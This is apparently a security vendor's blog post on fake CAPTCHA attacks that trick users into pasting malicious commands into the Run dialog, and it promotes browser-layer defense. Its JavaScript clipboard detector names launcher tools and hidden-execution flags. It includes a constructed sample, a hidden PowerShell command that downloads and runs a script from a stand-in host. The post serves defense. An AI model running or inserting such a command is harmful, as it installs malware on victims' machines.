April 15, 2025

Defeat Fake CAPTCHA Attacks from the Source

Shuyang Wang, Damien Miller-McAndrews

Cyber attackers continuously refine their strategies to evade standard security measures. Among the newest and most misleading techniques is the fake CAPTCHA attack. This tactic deceives users by presenting what appears to be a genuine verification challenge, but instead activates harmful code and steals personal information. What distinguishes these attacks from typical phishing attempts is their entry point—they infiltrate through web search engine optimization (SEO) rather than email, allowing them to circumvent traditional phishing detection systems and email security tools.

How fake CAPTCHA unfolds

At a high level, the attack involves the following steps:

  1. A victim is lured to a compromised or malicious website.
  2. A seemingly legitimate CAPTCHA is presented to the victim, who is asked to follow specific instructions in order to pass the challenge.
  3. Malicious content is inserted into the victim’s clipboard. The victim then follows the instructions provided to open the “Run As” dialog, paste the contents of the clipboard, and press enter.
  4. The malicious code is executed, typically reaching out to a remote location to download a malicious script. That script then executes and installs malware, typically info stealers or remote access tools.
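As an added example (not Obsidian’s own extension code), the check below shows how a browser-side content script could inspect text that a page writes to the clipboard at step 3, before the user is ever told to paste it. The regular expressions, the verdict thresholds and the two constructed samples are assumptions for illustration, not a complete signature set.

```javascript
// Heuristics for a fake-CAPTCHA clipboard payload. Each hit names the trait it
// matched; the patterns are assumptions chosen for illustration.
const LAUNCHERS = /\b(powershell|pwsh|cmd(\.exe)?|mshta|wscript|cscript|curl|certutil|bitsadmin|rundll32|regsvr32)\b/i;
const HIDDEN_OR_ENCODED = /(^|\s)-(?:w(?:indowstyle)?\s+hidden|e(?:nc|ncodedcommand)?\s+\S|nop\b|noprofile\b|ep\s+bypass|executionpolicy\s+bypass)/i;
const REMOTE_FETCH = /\b(https?:\/\/|iwr|invoke-webrequest|downloadstring|invoke-expression|iex)\b/i;
// Comment padding that tries to make the command look like a verification string.
const DISGUISE_COMMENT = /(#|::|rem\s).*?(robot|captcha|verif)/i;

function inspectClipboardText(text) {
  const hits = [];
  if (LAUNCHERS.test(text)) hits.push('launcher');
  if (HIDDEN_OR_ENCODED.test(text)) hits.push('hidden-or-encoded');
  if (REMOTE_FETCH.test(text)) hits.push('remote-fetch');
  if (DISGUISE_COMMENT.test(text)) hits.push('disguise-comment');
  // A launcher plus any other trait is blocked; a lone trait is only flagged for review.
  const verdict = hits.includes('launcher') && hits.length >= 2 ? 'block'
                : hits.length ? 'flag' : 'allow';
  return { verdict, hits };
}

// Wraps clipboard.writeText so a page-initiated copy is inspected first.
// Returns false where no clipboard API exists (e.g. under Node), so the
// functions above can still be exercised outside a browser.
function installClipboardGuard(clipboard, onBlock) {
  if (!clipboard || typeof clipboard.writeText !== 'function') return false;
  const original = clipboard.writeText.bind(clipboard);
  clipboard.writeText = (text) => {
    const result = inspectClipboardText(String(text));
    if (result.verdict === 'block') {
      onBlock(result);
      return Promise.reject(new Error('clipboard write blocked: ' + result.hits.join(',')));
    }
    return original(text);
  };
  return true;
}

// Constructed samples (not taken from a real campaign); the hostile one uses a reserved .invalid host.
const SAMPLES = {
  fakeCaptcha: 'powershell -w hidden -c "iwr http://example.invalid/a | iex" # I am not a robot',
  launcherOnly: 'curl --version prints the client version',
  benign: 'Meeting notes: review CAPTCHA placement on the signup page',
};

// In a content script this would be: installClipboardGuard(navigator.clipboard, r => console.warn('blocked', r.hits));
console.log(Object.entries(SAMPLES).map(([k, v]) => `${k}: ${inspectClipboardText(v).verdict}`).join('\n'));
```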

Since early this year, Obsidian has been tracking this threat's development and has identified several variations of these attacks.

New techniques

A new attack vector is emerging alongside traditional phishing emails: malicious websites ranking high in Google search results through aggressive SEO techniques. This approach is particularly effective because the entire attack sequence—from search to website interaction—occurs within the user's browser, completely circumventing standard phishing protections like Secure Email Gateways (SEGs).

When victims click on these malicious links, they typically encounter a fake CAPTCHA that appears immediately after a genuine Cloudflare Turnstile verification. This two-step approach serves dual purposes: it makes the fraudulent CAPTCHA appear more legitimate (as if the first verification failed), and it prevents security tools from examining the actual malicious content. The use of Cloudflare Turnstile as an evasion technique is becoming increasingly common, and our previous investigations have consistently found it being used in credential theft campaigns.

The downloaded malware typically belongs to well-known families of info stealers, designed to extract sensitive data—most often browser cookies and stored passwords. By harvesting and replaying web session cookies, threat actors can hijack a victim’s corporate identity. While these malware variants are well-documented by EDR vendors and won’t be the focus here, it is worth noting that Ukraine’s CERT has specifically warned about APT groups using this technique to compromise Office 365 accounts.

Stop the attack from the source

When attackers use Google search to lure users to malicious sites, the browser becomes the first—and most effective—line of defense. With the Obsidian secure browser extension, we see exactly what the user sees and can proactively block threats before they take the bait.

Even when a phishing page linked from an email is gated behind Cloudflare Turnstile, browser-layer defense remains effective. Turnstile can blind traditional email security solutions, but Obsidian stays alert—catching threats where others can’t.

While EDR solutions are valuable for detecting and responding to malware, they often kick in after the device has already been compromised—when the damage is done. By detecting and blocking threats at the browser layer, we stop attacks before they reach the device, eliminating the need for costly remediation and response.

The bottom line

Fake CAPTCHA attacks represent a growing blind spot in enterprise security—exploiting user trust, and web-layer blind spots that traditional tools can't catch. Whether the attack is delivered through a phishing email or a poisoned search result, the entry point is always the same: the browser.

EDR and email security solutions have their place, but also their limitations. Real protection starts at the source—before users are tricked into executing malicious code. That’s where browser-native defenses like Obsidian shine.

To stay ahead of evolving threats:

  • Focus on preventing attacks at the browser level, not just detecting them after the fact.
  • Deploy solutions that see what users see and stop clipboard-based execution chains.
  • Educate users on deceptive tactics like fake CAPTCHAs.

In a threat landscape where social engineering is more convincing than ever, proactive browser-layer defense isn’t optional—it’s essential.

Indicators of compromise (IOCs)


References

https://www.cisecurity.org/insights/blog/active-lumma-stealer-campaign-impacting-us-sltts

https://cert.gov.ua/article/6281123
